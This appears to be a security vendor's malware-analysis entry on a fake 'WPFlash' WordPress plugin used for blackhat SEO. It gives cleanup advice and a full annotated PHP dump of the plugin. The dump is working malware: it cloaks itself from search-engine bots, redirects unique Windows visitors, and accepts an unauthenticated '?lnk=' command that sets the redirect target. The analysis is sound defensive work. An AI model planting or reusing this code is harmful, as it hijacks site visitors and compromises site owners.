
php.spam-seo.fake-wpflash.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance.
This malware is installed into WordPress as a fake WPFlash plugin at /wp-content/plugins/WPFlash/WPFlash.php. All it does is redirect visitors coming from search engines to third-party sites.
It saves the addresses of the redirect target sites in the lnk.dat file and keeps track of unique redirected visitors using files in the uqdata subdirectory.
Every redirected visitor is recorded as an asterisk in stat_hits.dat. To perform the redirect, it hooks the "init" WordPress action.

Affecting

Vulnerable WordPress installations

Cleanup

Find and delete the malicious plugin from WordPress (and the server). Make sure to scan the server for backdoors and outdated software. Change all passwords.

Dump


<?php

/*
* Plugin Name: WPFlash
* Version: 1.0
* Author: Barabaka
*/
....

// Case-insensitive check for whether any needle in $array occurs in $str.
// Returns true on the first match, false when none of the needles is found.
// Used further down to skip visitors whose User-Agent contains a search-engine name.
function stripos_array($str, $array)
{
foreach($array as $substr)
{
// stripos() returns a byte offset (0 is a valid hit), hence the !== false test.
if (stripos($str, $substr) !== false)
return true;
}
return false;
}

// Coarse browser classification from the User-Agent header.
// Returns one of "ie", "firefox", "chrome", "opera", "safari", or "" when nothing matches.
// The only consumer in this dump is the visitor fingerprint built in is_user_unique().
// $_SERVER["HTTP_USER_AGENT"] is read without an isset() check, so a request without
// a User-Agent header produces an undefined-index notice/warning in the server log.
function get_user_browser()
{
$u_agent = $_SERVER["HTTP_USER_AGENT"];
$ub = "";

// Order matters: the first matching token wins, so "Chrome" is tested before "Safari".
if(preg_match('/MSIE/i',$u_agent))
{
$ub = "ie";
}
elseif(preg_match('/Firefox/i',$u_agent))
{
$ub = "firefox";
}
elseif(preg_match('/Chrome/i',$u_agent))
{
$ub = "chrome";
}
elseif(preg_match('/Opera/i',$u_agent))
{
$ub = "opera";
}
elseif(preg_match('/Safari/i',$u_agent))
{
$ub = "safari";
}

return $ub;
}

// Coarse OS classification from the User-Agent header; first matching token wins.
// Note the fallback at the end: a User-Agent that matches nothing is reported as
// "windows", which is the only value that enables the redirect path below, so an
// empty or unusual User-Agent is still treated as a redirect candidate.
function get_user_system()
{
$u_agent = $_SERVER["HTTP_USER_AGENT"];

if(stripos($u_agent, "Windows") !== false)
return "windows";

// "Apple" is tested before "Macintosh"; a UA containing an "Apple..." token
// (e.g. an AppleWebKit engine string) presumably returns "apple" before the
// "mac" branch is reached - verify against real UA samples.
if(stripos($u_agent, "Apple") !== false)
return "apple";

if(stripos($u_agent, "Android") !== false)
return "android";

if(stripos($u_agent, "Linux") !== false)
return "linux";

if(stripos($u_agent, "Macintosh") !== false)
return "mac";

// Default for unrecognised agents.
return "windows";
}

// Returns true the first time a given visitor fingerprint is seen, false afterwards.
// The fingerprint is md5(ip|browser|system) truncated to 8 hex chars; the first 3
// chars select a bucket file uqdata/<3 chars>.dat and the remaining 5 are stored
// inside it, space-separated. Side effect: creates the uqdata directory and
// appends to the bucket file on a first sighting.
// Paths are relative, so they resolve against the process working directory
// (presumably the WordPress root when loaded as a plugin - confirm on the host).
// For cleanup: the uqdata/ directory and its *.dat files are artifacts of this malware.
function is_user_unique()
{
$ip = $_SERVER["REMOTE_ADDR"];
$uid = $ip . "|" . get_user_browser() . "|" . get_user_system();
$uid = substr(md5($uid), 0, 8);

$uid1 = substr($uid, 0, 3);
$uid2 = substr($uid, 3);

// Already recorded: a plain substring search over the bucket's contents.
if(is_file("uqdata/{$uid1}.dat"))
if(strpos(file_get_contents("uqdata/{$uid1}.dat"), $uid2) !== false)
return false;

if(!is_dir("uqdata"))
mkdir("uqdata");

file_put_contents("uqdata/{$uid1}.dat", $uid2 . " ", FILE_APPEND);

return true;
}

// Callback registered on the WordPress "init" action (see the add_action call below).
// If lnk.dat exists, its raw contents are passed to wp_redirect() and execution stops;
// the stored URL is not validated or filtered in any way before use.
// The existence of lnk.dat is the only gate, so removing that file disables the
// redirect even before the plugin itself is deleted.
function try_redirect()
{
if(is_file("lnk.dat"))
{
$link = file_get_contents("lnk.dat");

wp_redirect($link);
exit;
}
}

// Control channel: any request carrying a "lnk" query parameter overwrites
// lnk.dat with the parameter value and answers with the body "OK". There is no
// authentication, nonce or capability check, so the redirect target can be
// changed by anyone who can reach the site. Web-server access-log entries with a
// "lnk=" parameter and a two-byte "OK" response are a useful indicator of this activity.
if(isset($_GET["lnk"]))
{
file_put_contents("lnk.dat", $_GET["lnk"]);
echo "OK";
exit;
}

// Hit counter: one asterisk per request that reaches this point (all visitors,
// not only redirected ones).
file_put_contents("stat_hits.dat", "*", FILE_APPEND);

// Crawler exclusion by User-Agent substring; stripos_array() returns a bool,
// so the loose == false comparison behaves like a strict one here.
$bots = array("google", "yahoo", "msn");
if(stripos_array($_SERVER['HTTP_USER_AGENT'], $bots) == false)
{
$system = get_user_system();
// Only "windows" visitors are redirected; note that get_user_system() also
// returns "windows" for unrecognised User-Agents.
if($system == "windows")
{
file_put_contents("stat_good.dat", "*", FILE_APPEND);

// Each visitor fingerprint is redirected once; repeat visits are left alone.
if(is_user_unique())
{
file_put_contents("stat_uniq.dat", "*", FILE_APPEND);

// The actual redirect happens later, when WordPress fires "init".
add_action("init", "try_redirect");
}
}
}
// Artifacts to look for alongside this file: lnk.dat, stat_hits.dat,
// stat_good.dat, stat_uniq.dat and the uqdata/ directory.

?>